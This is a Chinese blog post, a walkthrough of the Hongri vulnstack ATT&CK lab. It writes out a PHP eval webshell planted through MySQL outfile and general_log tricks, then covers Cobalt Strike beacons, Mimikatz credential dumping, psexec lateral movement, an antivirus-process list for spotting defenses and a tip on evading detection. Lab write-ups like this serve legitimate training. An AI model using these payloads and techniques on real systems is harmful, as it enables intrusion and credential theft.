<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="ATT&amp;CK 红日靶场实战演习心得笔记(一), null">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>ATT&amp;CK 红日靶场实战演习心得笔记(一) | null</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <span class="logo-span"></span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <div class="logo-name"></div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/23.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">ATT&amp;CK 红日靶场实战演习心得笔记(一)</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                                <span class="chip bg-color">内网渗透</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="post-category">
                                内网渗透
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-04-15
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.1k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    11 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <blockquote>
<p>20多岁了，我考虑过悍马，也看过野马，还想过宝马，后来看了看海马，最后选择了爱玛，付款的时候还是选择了沙琪玛</p>
</blockquote>
<h2 id="0x01-内网结构及靶机环境搭建"><a href="#0x01-内网结构及靶机环境搭建" class="headerlink" title="0x01 内网结构及靶机环境搭建"></a>0x01 内网结构及靶机环境搭建</h2><p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415170947063.png" alt="图片"></p>
<table>
<thead>
<tr>
<th><strong>名称</strong></th>
<th><strong>服务器</strong></th>
<th><strong>系统</strong></th>
<th><strong>网卡</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>VM1</strong></td>
<td>Web服务器</td>
<td>windows7 x64</td>
<td>NAT：192.168.213.130主机：192.168.52.137</td>
</tr>
<tr>
<td><strong>VM2</strong></td>
<td>域成员</td>
<td>win2k3 Metasploitable</td>
<td>主机：192.168.52.141</td>
</tr>
<tr>
<td><strong>VM3</strong></td>
<td>域控服务器</td>
<td>windows server 2008 R2 x64</td>
<td>主机：192.168.52.138</td>
</tr>
</tbody></table>
<p>注：以上靶机环境均来自<strong>红日安全团队</strong></p>
<p><strong>靶机下载地址：</strong></p>
<p><strong><a target="_blank" rel="noopener" href="http://vulnstack.qiyuanxuetang.net/vuln/detail/2/#screenshot">http://vulnstack.qiyuanxuetang.net/vuln/detail/2/#screenshot</a></strong><br>以上靶机所有统一密码为：**<strong>hongrisec@2019</strong></p>
<p>我这里改成了 <strong>admin@123</strong></p>
<h3 id="搭建环境注意事项"><a href="#搭建环境注意事项" class="headerlink" title="搭建环境注意事项"></a>搭建环境注意事项</h3><ol>
<li><p>vm1 靶机 需要自己去启动phpstudy，默认是没有开启的，这里我当时还卡了一会，真的tcccccl.<img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415171038745.png" alt="图片"></p>
</li>
<li><p>配置网络的时候，只需要改第一个靶机也就是vm1（windows 7的），新加一个外网环境的网卡就ok，可以是nat也可以是桥接，另外一个必须得是仅主机模式，默认的地址是 192.168.52.0/24 ,不要改成其他的，因为主机加入域的时候，dns 是域控的ip ,写死的192.168.52.130 。</p>
</li>
</ol>
<h2 id="0x02-外网getshell"><a href="#0x02-外网getshell" class="headerlink" title="0x02 外网getshell"></a>0x02 <strong>外网getshell</strong></h2><h3 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h3><p>正常打开是一个php探针</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173255527.png" alt="图片"></p>
<p>利用点：</p>
<ol>
<li><p>检查php禁用了哪些函数</p>
</li>
<li><p>爆破数据库密码</p>
</li>
</ol>
<p>目录扫描（这里用的是dirsearch)</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173301179.png" alt="图片"></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173258711.png" alt="图片"></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173303287.png" alt="图片"></p>
<p>PS：ctf打的比较多，如果日后遇到其他服务器有墙的情况下，可以设置线程的方式来进行扫描</p>
<p>（dirsearch.py -u url -e * –timeout=2 -t 1 -x 400,403,404,500,503,429）</p>
<p>具体细节不一一描述，</p>
<blockquote>
<p>综上所述</p>
<p>IP地址：192.168.213.130</p>
<p>主机信息：Windows NT STU1 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586</p>
<p>服务器解析引擎：Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45</p>
<p>网站绝对路径：C:/phpStudy/WWW</p>
<p>被禁用函数：无</p>
<p>网站类型：yxcms，有后台</p>
<p>数据库账号和密码：root/root</p>
<p>phpmyAdmin: <a target="_blank" rel="noopener" href="http://192.168.213.130/phpmyAdmin/">http://192.168.213.130/phpmyAdmin/</a></p>
</blockquote>
<h3 id="mysql-数据库日志getshell"><a href="#mysql-数据库日志getshell" class="headerlink" title="mysql 数据库日志getshell"></a>mysql 数据库日志getshell</h3><p>爆破拿到数据库账号密码后，又发现有phpmyAdmin，所以想拿到shell就有很多办法了。</p>
<p>最常见的就是</p>
<pre class="line-numbers language-none"><code class="language-none">select &#39;&lt;?php eval($_POST[rh]); ?&gt;&#39; into outfile &#39;C:&#x2F;phpStudy&#x2F;WWW&#x2F;ma.php&#39;;
select load_file(&#39;C:&#x2F;phpStudy&#x2F;WWW&#x2F;rh.php&#39;);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>但是这里是行不通，所以可以通过mysql版本&gt;5.0这一特性来getshell，</p>
<p>因为mysql5.0以上会创建日志文件，可以通过修改日志的保存路径来getshell</p>
<p>操作步骤：</p>
<p>SHOW VARIABLES LIKE ‘general%’</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173310634.png" alt="图片"></p>
<p>general log 指的是日志保存状态，一共有两个值（ON/OFF）ON代表开启 OFF代表关闭。</p>
<p>general log file 指的是日志的保存路径。（上面显示的是我已经改好的，默认的是OFF，且路径不在web目录下，应该是在数据库的目录下）</p>
<p>然后：</p>
<ol>
<li><p>开启日志存储</p>
</li>
<li><p>修改日志保存路径</p>
</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">set global general_log &#x3D; &quot;ON&quot;;set global general_log_file&#x3D;&#39;C:&#x2F;phpStudy&#x2F;WWW&#x2F;rh.php&#39;;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ol start="3">
<li>这是为了让数据库记录我们输入的语句，从而写入木马</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">select &#39;&lt;?php eval($_POST[cmd]);?&gt;&#39;;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173313365.png" alt="图片"></p>
<ol start="4">
<li>然后直接用蚁剑连接即可</li>
</ol>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173315228.png" alt="图片"></p>
<h3 id="文件上传getshell"><a href="#文件上传getshell" class="headerlink" title="文件上传getshell"></a>文件上传getshell</h3><p>除此之外，还可以通过cms的漏洞来进行getshell</p>
<p>在网页上看到了用户名和密码（在正常的站当中很少会出现这样的情况，但是我依然可以通过这样的弱口令去尝试，尤其是一些旁站，弱口令是最容易入手的一个环节）</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173319225.png" alt="图片"></p>
<p>登陆进去后直接编辑对应的php文件，然后找到对应的文件即可getshell，这里靶机是自留了一个后门。</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173322039.png" alt="图片"></p>
<h2 id="0x03-基于CobaltStrike的内网渗透"><a href="#0x03-基于CobaltStrike的内网渗透" class="headerlink" title="0x03 基于CobaltStrike的内网渗透"></a>0x03 基于CobaltStrike的内网渗透</h2><p>由于本靶机全部都是windows环境，而且均没有使用杀毒软件，所以用cobaltstrike 是最佳之选了。当然在后面我也会介绍其他的几种用法～～～</p>
<p>首先开启服务端, 这里也可以通过用<strong>screen</strong>命令来后台运行</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173326651.png" alt="图片"></p>
<p>客户端看个人情况，有些人下载没有去编译客户端，所以需要使用下面的命令打开：</p>
<p>java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar</p>
<ol>
<li>首先利用cs监听一个端口</li>
</ol>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173328951.png" alt="图片"></p>
<ol start="2">
<li>生成一个windows64位的木马，因靶机环境没有装杀毒软件，所以这里没有用免杀马，后续文章将会具体介绍各种免杀马</li>
</ol>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173335603.png" alt="图片"></p>
<ol start="3">
<li><p>生成的木马放到win7虚拟机中运行即可获取shell，可以发现是管理员权限。 </p>
<p>（注：拿到shell后一定要设置心跳值，默认的为60秒，所以执行命令等操作都会很慢，做实验的话设置0或者1就行。但平时实战中尽量设置高点，不然容易被检测到）**</p>
</li>
</ol>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173337833.png" alt="图片"></p>
<ol start="4">
<li><p>拿到shell后可以基本的信息收集一波, 如 net user 、 whoami、hostname等等。当然我平时基本上就是一条命令搞定-systeminfo，基本上一条命令就能一目了然。（小知识：如果嫌看的麻烦，几条命令可以快速的知道操作系统和版本：</p>
<p>系统中文：<code>systeminfo | findstr /B /C:&quot;OS 名称&quot; /C:&quot;OS 版本&quot;</code><br>系统英文：<code>systeminfo | findstr /B /C:&quot;OS Name&quot; /C:&quot;OS Version&quot;</code></p>
<p>查询系统体系架构：echo % PROCESSOR_ARCHITECTURE%</p>
<p>查询已安装的软件及版本信息：wmic product get name,version</p>
</li>
</ol>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173431352.png" alt="图片"></p>
<ol start="5">
<li>其次就是看系统进程，一般主要都是为了查看有没有一些杀毒软件，这里是没有，也不详细介绍了。另外附带一个常见的杀软进程表：</li>
</ol>
<table>
<thead>
<tr>
<th>进程名</th>
<th><strong>软件</strong></th>
</tr>
</thead>
<tbody><tr>
<td>360sd.exe</td>
<td>360 杀毒</td>
</tr>
<tr>
<td>360tray.exe</td>
<td>360 实时保护</td>
</tr>
<tr>
<td>ZhuDongFangYu.exe</td>
<td>360 主动防御</td>
</tr>
<tr>
<td>KSafeTray.exe</td>
<td>金山卫士</td>
</tr>
<tr>
<td>SafeDogUpdateCenter.exe</td>
<td>安全狗</td>
</tr>
<tr>
<td>McAfee</td>
<td>McShield.exe</td>
</tr>
<tr>
<td>egui.exe</td>
<td>NOD32</td>
</tr>
<tr>
<td>AVP.exe</td>
<td>卡巴斯基</td>
</tr>
<tr>
<td>avguard.exe</td>
<td>小红伞</td>
</tr>
<tr>
<td>bdagent.exe</td>
<td>BitDefender</td>
</tr>
<tr>
<td>QQPCRTP.exe</td>
<td>QQ电脑管家</td>
</tr>
<tr>
<td>mssecess.exe</td>
<td>微软杀毒</td>
</tr>
<tr>
<td>BaiduSdSvc.exe</td>
<td>百度杀软</td>
</tr>
<tr>
<td>rfwmain.exe</td>
<td>瑞星防火墙</td>
</tr>
<tr>
<td>beikesan.exe</td>
<td>贝壳云安全</td>
</tr>
<tr>
<td>KSWebShield.exe</td>
<td>金山网盾</td>
</tr>
<tr>
<td>V3Svc.exe</td>
<td>安博士V3</td>
</tr>
<tr>
<td>remupd.exe</td>
<td>熊猫卫士</td>
</tr>
<tr>
<td>vba32lder.exe</td>
<td>vb32杀毒</td>
</tr>
<tr>
<td>K7TSecurity.exe</td>
<td>K7杀毒</td>
</tr>
</tbody></table>
<ol start="6">
<li>此环境 重点讲的还是域，所以还是重点提下域环境的收集。</li>
</ol>
<ul>
<li>那什么是域呢？</li>
</ul>
<blockquote>
<p>域是计算机网络的一种形式，其中所有用户帐户 ，计算机，打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。身份验证在域控制器上进行。在域中使用计算机的每个人都会收到一个唯一的用户帐户，然后可以为该帐户分配对该域内资源的访问权限。从Windows Server 2003开始 ， Active Directory是负责维护该中央数据库的Windows组件。Windows域的概念与工作组的概念形成对比，在该工作组中，每台计算机都维护自己的安全主体数据库。</p>
</blockquote>
<ul>
<li>怎么确定拿到的shell是否存在域呢？</li>
</ul>
<p>1）使用 net config workstation </p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173437851.png" alt="图片"></p>
<p>2）使用 <code>ipconfig /all</code> 查看 <code>DNS</code> 服务器</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173440346.png" alt="图片"></p>
<p>3） 像下面我在另外一个没有域环境的windows主机执行该命令会发现显示的是工作者，这种的肯定是不存在域的。 <strong>（注：如果发生系统错误5，则说明是存在域的，只是当前用户不是域用户而已）</strong></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173442541.png" alt="图片"></p>
<p>4）由于文章过长，这里就不一一的贴上对应命令的图片了，对域的一些其他的信息收集命令：</p>
<blockquote>
<p>获取域内用户的详细信息，如用户名、描述信息、SID域名等：<code>wmic useraccount get /all</code></p>
<p>查看所有域成员计算机列表：<code>net group &quot;domain computers&quot; /domain</code></p>
<p>查看域管理员：<code>net group &quot;domain admins&quot; /domain</code></p>
<p>获取域密码信息：<code>net accounts /domain</code></p>
<p>获取域信任信息 (cs 里执行提示不是内部或外部命令)：<code>nltest /domain_trusts</code></p>
</blockquote>
<ol start="7">
<li>基本的信息搜集后，确认有域用户，就可以直接进行内网渗透了，因是管理员权限，所以可以尝试是否能提权，这里可以使用cs自带的提权插件进行提权，最终发现svc-exe插件可以进行提取。</li>
</ol>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173449885.png" alt="图片"></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173452317.png" alt="图片"></p>
<ol start="8">
<li>提权成功后就可以开始打内网了，执行ipconfig命令是可以看到存在两个网卡，分别为：</li>
</ol>
<p>192.168.213.130（外网）</p>
<p>192.168.52.137（内网）</p>
<p>然后使用cs自带的端口扫描工具对192.168.52.0/24进行扫描</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173454387.png" alt="图片"></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173637191.png" alt="图片"></p>
<ol start="9">
<li>发现确实内网还存在其他两台存活主机，并且发现均开放了445端口，基本断定是两台windows系统的主机，这个实话可以联想到445端口弱口令、永恒之蓝等等</li>
</ol>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173642578.png" alt="图片"></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415174527533.png" alt="图片"></p>
<ol start="10">
<li>一步一步的来，先利用cs自带的Minikatz（密码抓取神器）获取当前系统所有用户的一些</li>
</ol>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173645196.png" alt="图片"></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173647658.png" alt="图片"></p>
<ol start="11">
<li>现在已经拿到了用户名和密码，且内网其他两台机器开放了445端口，所以可以尝试使用抓取到的用户和密码通过psexec进行登陆。</li>
</ol>
<blockquote>
<p>psExec是微软pstools工具包中最常用的一个工具，也是在内网渗透中的免杀渗透利器。</p>
<p>psExec能够在命令行下在对方没有开启telnet服务的时候返回一个半交互的命令行，像telnet客户端一样。非常方便我们的工作，之所以叫半交互是因为这个命令行不能够执行一条命令中有交互的回显，比如runas的密码输入</p>
</blockquote>
<p>在登陆之前需要利用cs派生SMB Beacon</p>
<blockquote>
<p>SMB Beacon 使用命名管道通过父级 Beacon 进行通讯，当两个 Beacons 链接后，子 Beacon 从父 Beacon 获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信，此流量封装在 SMB 协议中，所以 SMB Beacon 相对隐蔽,  也可以用此特点绕过一些防火墙</p>
</blockquote>
<p>这里使用的是4.2版本的cs，所以跟3.x的会略有不同，其原理一样</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173651619.png" alt="图片"></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173653799.png" alt="图片"></p>
<p>点击运行后即可获取shell</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173655892.png" alt="图片"></p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173657996.png" alt="图片"></p>
<p>同样的方法依然可以获取192.168.52.141的shell</p>
<p><img src="/2021/04/15/ATT-CK-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98%E6%BC%94%E4%B9%A0%E5%BF%83%E5%BE%97%E7%AC%94%E8%AE%B0-%E4%B8%80/640-20210415173703265.png" alt="图片"></p>
